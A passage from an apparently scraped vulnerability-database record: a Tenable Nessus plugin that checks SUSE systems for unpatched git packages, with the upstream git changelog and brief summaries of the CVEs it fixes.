commands learned to take the pathspec from the standard input or\na named file, instead of taking it as the command line arguments, with\nthe '--pathspec-from-file' option.\n\nTest updates to prepare for SHA-2 transition continues.\n\nRedo 'git name-rev' to avoid recursive calls.\n\nWhen all files from some subdirectory were renamed to the root\ndirectory, the directory rename heuristics would fail to detect that\nas a rename/merge of the subdirectory to the root directory, which has\nbeen corrected.\n\nHTTP transport had possible allocator/deallocator mismatch, which has\nbeen corrected.\n\ngit 2.24.1 :\n\nCVE-2019-1348: The --export-marks option of fast-import is exposed\nalso via the in-stream command feature export-marks=... and it allows\noverwriting arbitrary paths (bsc#1158785)\n\nCVE-2019-1349: on Windows, when submodules are cloned recursively,\nunder certain circumstances Git could be fooled into using the same\nGit directory twice (bsc#1158787)\n\nCVE-2019-1350: Incorrect quoting of command-line arguments allowed\nremote code execution during a recursive clone in conjunction with SSH\nURLs (bsc#1158788)\n\nCVE-2019-1351: on Windows mistakes drive letters outside of the\nUS-English alphabet as relative paths (bsc#1158789)\n\nCVE-2019-1352: on Windows was unaware of NTFS Alternate Data Streams\n(bsc#1158790)\n\nCVE-2019-1353: when run in the Windows Subsystem for Linux while\naccessing a working directory on a regular Windows drive, none of the\nNTFS protections were active (bsc#1158791)\n\nCVE-2019-1354: on Windows refuses to write tracked files with\nfilenames that contain backslashes (bsc#1158792)\n\nCVE-2019-1387: Recursive clones vulnerability that is caused by\ntoo-lax validation of submodule names, allowing very targeted attacks\nvia remote code execution in recursive clones (bsc#1158793)\n\nCVE-2019-19604: a recursive clone followed by a submodule update could\nexecute code contained within the repository without the user\nexplicitly having asked for that (bsc#1158795)\n\ngit 2.24.0\n\nThe command line parser learned '--end-of-options' notation.\n\nA mechanism to affect the default setting for a (related) group of\nconfiguration variables is introduced.\n\n'git fetch' learned '--set-upstream' option to help those who first\nclone from their private fork they intend to push to, add the true\nupstream via 'git remote add' and then 'git fetch' from it.\n\nfixes and improvements to UI, workflow and features, bash completion\nfixes\n\ngit 2.23.0 :\n\nThe '--base' option of 'format-patch' computed the patch-ids for\nprerequisite patches in an unstable way, which has been updated to\ncompute in a way that is compatible with 'git patch-id\n\n--stable'.\n\nThe 'git log' command by default behaves as if the --mailmap option\nwas given.\n\nfixes and improvements to UI, workflow and features\n\ngit 2.22.1\n\nA relative pathname given to 'git init --template=<path> <repo>' ought\nto be relative to the directory 'git init' gets invoked in, but it\ninstead was made relative to the repository, which has been corrected.\n</repo></path>\n\n'git worktree add' used to fail when another worktree connected to the\nsame repository was corrupt, which has been corrected.\n\n'git am -i --resolved' segfaulted after trying to see a commit as if\nit were a tree, which has been corrected.\n\n'git merge --squash' is designed to update the working tree and the\nindex without creating the commit, and this cannot be countermanded by\nadding the '--commit' option; the command now refuses to work when\nboth options are given.\n\nUpdate to Unicode 12.1 width table.\n\n'git request-pull' learned to warn when the ref we ask them to pull\nfrom in the local repository and in the published repository are\ndifferent.\n\n'git fetch' into a lazy clone forgot to fetch base objects that are\nnecessary to complete delta in a thin packfile, which has been\ncorrected.\n\nThe URL decoding code has been updated to avoid going past the end of\nthe string while parsing %-<hex>-<hex> sequence. </hex></hex>\n\n'git clean' silently skipped a path when it cannot lstat() it; now it\ngives a warning.\n\n'git rm' to resolve a conflicted path leaked an internal message\n'needs merge' before actually removing the path, which was confusing.\nThis has been corrected.\n\nMany more bugfixes and code cleanups.\n\nremoval of SuSEfirewall2 service, since SuSEfirewall2 has been\nreplaced by firewalld.\n\npartial fix for git instaweb giving 500 error (bsc#1112230)\n\ngit 2.22.0\n\nThe filter specification '--filter=sparse:path=<path>' used to create\na lazy/partial clone has been removed. Using a blob that is part of\nthe project as sparse specification is still supported with the\n'--filter=sparse:oid=<blob>' option </blob></path>\n\n'git checkout --no-overlay' can be used to trigger a new mode of\nchecking out paths out of the tree-ish, that allows paths that match\nthe pathspec that are in the current index and working tree and are\nnot in the tree-ish.\n\nFour new configuration variables {author,committer}.{name,email} have\nbeen introduced to override user.{name,email} in more specific cases.\n\n'git branch' learned a new subcommand '--show-current'.\n\nThe command line completion (in contrib/) has been taught to complete\nmore subcommand parameters.\n\nThe completion helper code now pays attention to repository-local\nconfiguration (when available), which allows --list-cmds to honour a\nrepository specific setting of completion.commands, for example.\n\nThe list of conflicted paths shown in the editor while concluding a\nconflicted merge was shown above the scissors line when the clean-up\nmode is set to 'scissors', even though it was commented out just like\nthe list of updated paths and other information to help the user\nexplain the merge better.\n\n'git rebase' that was reimplemented in C did not set ORIG_HEAD\ncorrectly, which has been corrected.\n\n'git worktree add' used to do a 'find an available name with stat and\nthen mkdir', which is race-prone. This has been fixed by using mkdir\nand reacting to EEXIST in a loop.\n\nMove to DocBook 5.x. Asciidoctor 2.x no longer supports the legacy\nDocBook 4.5 format.\n\nupdate git-web AppArmor profile for bash and tar usrMerge\n(bsc#1132350)\n\ngit 2.21.0\n\nHistorically, the '-m' (mainline) option can only be used for 'git\ncherry-pick' and 'git revert' when working with a merge commit. This\nversion of Git no longer warns or errors out when working with a\nsingle-parent commit, as long as the argument to the '-m' option is 1\n(i.e. it has only one parent, and the request is to pick or revert\nrelative to that first parent). Scripts that relied on the behaviour\nmay get broken with this change.\n\nSmall fixes and features for fast-export and fast-import.\n\nThe 'http.version' configuration variable can be used with recent\nenough versions of cURL library to force the version of HTTP used to\ntalk when fetching and pushing.\n\n'git push $there $src:$dst' rejects when $dst is not a fully qualified\nrefname and it is not clear what the end user meant.\n\nUpdate 'git multimail' from the upstream.\n\nA new date format '--date=human' that morphs its output depending on\nhow far the time is from the current time has been introduced.\n'--date=auto:human' can be used to use this new format (or any\nexisting format) when the output is going to the pager or to the\nterminal, and otherwise the default format.\n\nFix worktree creation race (bsc#1114225).\n\nadd shadow build dependency to the -daemon subpackage.\n\ngit 2.20.1 :\n\nportability fixes\n\n'git help -a' did not work well when an overly long alias was defined\n\nno longer squelched an error message when the run_command API failed\nto run a missing command\n\ngit 2.20.0\n\n'git help -a' now gives verbose output (same as 'git help -av'). Those\nwho want the old output may say 'git help --no-verbose -a'..\n\n'git send-email' learned to grab address-looking string on any trailer\nwhose name ends with '-by'.\n\n'git format-patch' learned new '--interdiff' and '--range-diff'\noptions to explain the difference between this version and the\nprevious attempt in the cover letter (or after the three-dashes as a\ncomment).\n\nDeveloper builds now use -Wunused-function compilation option.\n\nFix a bug in which the same path could be registered under multiple\nworktree entries if the path was missing (for instance, was removed\nmanually). Also, as a convenience, expand the number of cases in which\n\n--force is applicable.\n\nThe overly large Documentation/config.txt file have been split into\nmillion little pieces. This potentially allows each individual piece\nto be included into the manual page of the command it affects more\neasily.\n\nMalformed or crafted data in packstream can make our code attempt to\nread or write past the allocated buffer and abort, instead of\nreporting an error, which has been fixed.\n\nFix for a long-standing bug that leaves the index file corrupt when it\nshrinks during a partial commit.\n\n'git merge' and 'git pull' that merges into an unborn branch used to\ncompletely ignore '--verify-signatures', which has been corrected.\n\n...and much more features and fixes\n\ngit 2.19.2 :\n\nvarious bug fixes for multiple subcommands and operations\n\ngit 2.19.1 :\n\nCVE-2018-17456: Specially crafted .gitmodules files may have allowed\narbitrary code execution when the repository is cloned with\n\n--recurse-submodules (bsc#1110949)\n\ngit 2.19.0 :\n\n'git diff' compares the index and the working tree. For paths added\nwith intent-to-add bit, the command shows the full contents of them as\nadded, but the paths themselves were not marked as new files. They are\nnow shown as new by default.\n\n'git apply' learned the '--intent-to-add' option so that an otherwise\nworking-tree-only application of a patch will add new paths to the\nindex marked with the 'intent-to-add' bit.\n\n'git grep' learned the '--column' option that gives not just the line\nnumber but the column number of the hit.\n\nThe '-l' option in 'git branch -l' is an unfortunate short-hand for\n'--create-reflog', but many users, both old and new, somehow expect it\nto be something else, perhaps '--list'. This step warns when '-l' is\nused as a short-hand for '--create-reflog' and warns about the future\nrepurposing of the it when it is used.\n\nThe userdiff pattern for .php has been updated.\n\nThe content-transfer-encoding of the message 'git send-email' sends\nout by default was 8bit, which can cause trouble when there is an\noverlong line to bust RFC 5322/2822 limit. A new option 'auto' to\nautomatically switch to quoted-printable when there is such a line in\nthe payload has been introduced and is made the default.\n\n'git checkout' and 'git worktree add' learned to honor\ncheckout.defaultRemote when auto-vivifying a local branch out of a\nremote tracking branch in a repository with multiple remotes that have\ntracking branches that share the same names. (merge 8d7b558bae\nab/checkout-default-remote later to maint).\n\n'git grep' learned the '--only-matching' option.\n\n'git rebase --rebase-merges' mode now handles octopus merges as well.\n\nAdd a server-side knob to skip commits in exponential/fibbonacci\nstride in an attempt to cover wider swath of history with a smaller\nnumber of iterations, potentially accepting a larger packfile\ntransfer, instead of going back one commit a time during common\nancestor discovery during the 'git fetch' transaction. (merge\n42cc7485a2 jt/fetch-negotiator-skipping later to maint).\n\nA new configuration variable core.usereplacerefs has been added,\nprimarily to help server installations that want to ignore the replace\nmechanism altogether.\n\nTeach 'git tag -s' etc. a few configuration variables (gpg.format that\ncan be set to 'openpgp' or 'x509', and gpg.<format>.program that is\nused to specify what program to use to deal with the format) to allow\nx.509 certs with CMS via 'gpgsm' to be used instead of openpgp via\n'gnupg'. </format>\n\nMany more strings are prepared for l10n.\n\n'git p4 submit' learns to ask its own pre-submit hook if it should\ncontinue with submitting.\n\nThe test performed at the receiving end of 'git push' to prevent bad\nobjects from entering repository can be customized via receive.fsck.*\nconfiguration variables; we now have gained a counterpart to do the\nsame on the 'git fetch' side, with fetch.fsck.* configuration\nvariables.\n\n'git pull --rebase=interactive' learned 'i' as a short-hand for\n'interactive'.\n\n'git instaweb' has been adjusted to run better with newer Apache on\nRedHat based distros.\n\n'git range-diff' is a reimplementation of 'git tbdiff' that lets us\ncompare individual patches in two iterations of a topic.\n\nThe sideband code learned to optionally paint selected keywords at the\nbeginning of incoming lines on the receiving end.\n\n'git branch --list' learned to take the default sort order from the\n'branch.sort' configuration variable, just like 'git tag --list' pays\nattention to 'tag.sort'.\n\n'git worktree' command learned '--quiet' option to make it less\nverbose.\n\ngit 2.18.0 :\n\nimprovements to rename detection logic\n\nWhen built with more recent cURL, GIT_SSL_VERSION can now specify\n'tlsv1.3' as its value.\n\n'git mergetools' learned talking to guiffy.\n\nvarious other workflow improvements and fixes\n\nperformance improvements and other developer visible fixes\n\ngit 2.17.1\n\nSubmodule 'names' come from the untrusted .gitmodules file, but we\nblindly append them to $GIT_DIR/modules to create our on-disk repo\npaths. This means you can do bad things by putting '../' into the\nname. We now enforce some rules for submodule names which will cause\nGit to ignore these malicious names (CVE-2018-11235, bsc#1095219)\n\nIt was possible to trick the code that sanity-checks paths on NTFS\ninto reading random piece of memory (CVE-2018-11233, bsc#1095218)\n\nSupport on the server side to reject pushes to repositories that\nattempt to create such problematic .gitmodules file etc. as tracked\ncontents, to help hosting sites protect their customers by preventing\nmalicious contents from spreading.\n\ngit 2.17.0 :\n\n'diff' family of commands learned '--find-object=<object-id>' option\nto limit the findings to changes that involve the named object.\n</object-id>\n\n'git format-patch' learned to give 72-cols to diffstat, which is\nconsistent with other line length limits the subcommand uses for its\noutput meant for e-mails.\n\nThe log from 'git daemon' can be redirected with a new option; one\nrelevant use case is to send the log to standard error (instead of\nsyslog) when running it from inetd.\n\n'git rebase' learned to take '--allow-empty-message' option.\n\n'git am' has learned the '--quit' option, in addition to the existing\n'--abort' option; having the pair mirrors a few other commands like\n'rebase' and 'cherry-pick'.\n\n'git worktree add' learned to run the post-checkout hook, just like\n'git clone' runs it upon the initial checkout.\n\n'git tag' learned an explicit '--edit' option that allows the message\ngiven via '-m' and '-F' to be further edited.\n\n'git fetch --prune-tags' may be used as a handy short-hand for getting\nrid of stale tags that are locally held.\n\nThe new '--show-current-patch' option gives an end-user facing way to\nget the diff being applied when 'git rebase' (and 'git am') stops with\na conflict.\n\n'git add -p' used to offer '/' (look for a matching hunk) as a choice,\neven there was only one hunk, which has been corrected. Also the\nsingle-key help is now given only for keys that are enabled (e.g. help\nfor '/' won't be shown when there is only one hunk).\n\nSince Git 1.7.9, 'git merge' defaulted to --no-ff (i.e. even when the\nside branch being merged is a descendant of the current commit, create\na merge commit instead of fast-forwarding) when merging a tag object.\nThis was appropriate default for integrators who pull signed tags from\ntheir downstream contributors, but caused an unnecessary merges when\nused by downstream contributors who habitually 'catch up' their topic\nbranches with tagged releases from the upstream. Update 'git merge' to\ndefault to --no-ff only when merging a tag object that does *not* sit\nat its usual place in refs/tags/ hierarchy, and allow fast-forwarding\notherwise, to mitigate the problem.\n\n'git status' can spend a lot of cycles to compute the relation between\nthe current branch and its upstream, which can now be disabled with\n'--no-ahead-behind' option.\n\n'git diff' and friends learned funcname patterns for Go language\nsource files.\n\n'git send-email' learned '--reply-to=<address>' option. </address>\n\nFuncname pattern used for C# now recognizes 'async' keyword.\n\nIn a way similar to how 'git tag' learned to honor the pager setting\nonly in the list mode, 'git config' learned to ignore the pager\nsetting when it is used for setting values (i.e. when the purpose of\nthe operation is not to 'show').\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1063412\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1095218\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1095219\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1110949\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1112230\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1114225\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1132350\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1149792\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1156651\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1158785\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1158787\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1158788\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1158789\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1158790\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1158791\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1158792\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1158793\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1158795\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1167890\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1168930\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1169605\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1169786\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1169936\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2017-15298/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2018-11233/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2018-11235/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2018-17456/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-1348/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-1349/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-1350/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-1351/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-1352/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-1353/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-1354/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-1387/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-19604/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-11008/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-5260/\");\n # https://www.suse.com/support/update/announcement/2020/suse-su-20201121-1/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?47879213\");\n script_set_attribute(attribute:\"solution\", value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Module for Open Buildservice Development Tools\n15-SP1 :\n\nzypper in -t patch\nSUSE-SLE-Module-Development-Tools-OBS-15-SP1-2020-1121=1\n\nSUSE Linux Enterprise Module for Development Tools 15-SP1 :\n\nzypper in -t patch\nSUSE-SLE-Module-Development-Tools-15-SP1-2020-1121=1\n\nSUSE Linux Enterprise Module for Basesystem 15-SP1 :\n\nzypper in -t patch SUSE-SLE-Module-Basesystem-15-SP1-2020-1121=1\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-19604\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2019-1353\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Malicious Git HTTP Server For CVE-2018-17456');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/10/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/04/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-arch\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-core-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-credential-gnome-keyring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-credential-gnome-keyring-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-credential-libsecret\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-credential-libsecret-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-cvs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-daemon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-daemon-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-email\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-p4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-svn\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-svn-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-web\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:gitk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED15|SLES15)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED15 / SLES15\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES15\" && (! preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP1\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED15\" && (! preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED15 SP1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"git-2.26.1-3.25.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"git-arch-2.26.1-3.25.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"git-core-2.26.1-3.25.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"git-core-debuginfo-2.26.1-3.25.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"git-credential-gnome-keyring-2.26.1-3.25.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"git-credential-gnome-keyring-debuginfo-2.26.1-3.25.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"git-credential-libsecret-2.26.1-3.25.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"git-credential-libsecret-debuginfo-2.26.1-3.25.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"git-cvs-2.26.1-3.25.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"git-daemon-2.26.1-3.25.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"git-daemon-debuginfo-2.26.1-3.25.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"git-debuginfo-2.26.1-3.25.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"git-debugsource-2.26.1-3.25.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"git-email-2.26.1-3.25.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"git-gui-2.26.1-3.25.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"git-p4-2.26.1-3.25.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"git-svn-2.26.1-3.25.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"git-svn-debuginfo-2.26.1-3.25.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"git-web-2.26.1-3.25.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"gitk-2.26.1-3.25.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"git-2.26.1-3.25.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"git-arch-2.26.1-3.25.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"git-core-2.26.1-3.25.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"git-core-debuginfo-2.26.1-3.25.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"git-credential-gnome-keyring-2.26.1-3.25.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"git-credential-gnome-keyring-debuginfo-2.26.1-3.25.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"git-credential-libsecret-2.26.1-3.25.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"git-credential-libsecret-debuginfo-2.26.1-3.25.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"git-cvs-2.26.1-3.25.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"git-daemon-2.26.1-3.25.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"git-daemon-debuginfo-2.26.1-3.25.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"git-debuginfo-2.26.1-3.25.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"git-debugsource-2.26.1-3.25.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"git-email-2.26.1-3.25.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"git-gui-2.26.1-3.25.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"git-p4-2.26.1-3.25.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"git-svn-2.26.1-3.25.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"git-svn-debuginfo-2.26.1-3.25.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"git-web-2.26.1-3.25.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"gitk-2.26.1-3.25.2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"git\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-17T14:16:36", "description": "This update for git fixes the following issues :\n\nSecurity issues fixed :\n\n - CVE-2020-11008: Specially crafted URLs may have tricked the credentials helper to providing credential information that is not appropriate for the protocol in use and host being contacted (bsc#1169936)\n\ngit was updated to 2.26.1 (bsc#1169786, jsc#ECO-1628, bsc#1149792)\n\n - Fix git-daemon not starting after conversion from sysvinit to systemd service (bsc#1169605).\n\n - CVE-2020-5260: Specially crafted URLs with newline characters could have been used to make the Git client to send credential information for a wrong host to the attacker's site bsc#1168930\n\ngit 2.26.0 (bsc#1167890, jsc#SLE-11608) :\n\n - 'git rebase' now uses a different backend that is based on the 'merge' machinery by default. The 'rebase.backend' configuration variable reverts to old behaviour when set to 'apply'\n\n - Improved handling of sparse checkouts\n\n - Improvements to many commands and internal features\n\ngit 2.25.2 :\n\n - bug fixes to various subcommands in specific operations\n\ngit 2.25.1 :\n\n - 'git commit' now honors advise.statusHints\n\n - various updates, bug fixes and documentation updates\n\ngit 2.25.0\n\n - The branch description ('git branch --edit-description') has been used to fill the body of the cover letters by the format-patch command; this has been enhanced so that the subject can also be filled.\n\n - A few commands learned to take the pathspec from the standard input or a named file, instead of taking it as the command line arguments, with the '--pathspec-from-file' option.\n\n - Test updates to prepare for SHA-2 transition continues.\n\n - Redo 'git name-rev' to avoid recursive calls.\n\n - When all files from some subdirectory were renamed to the root directory, the directory rename heuristics 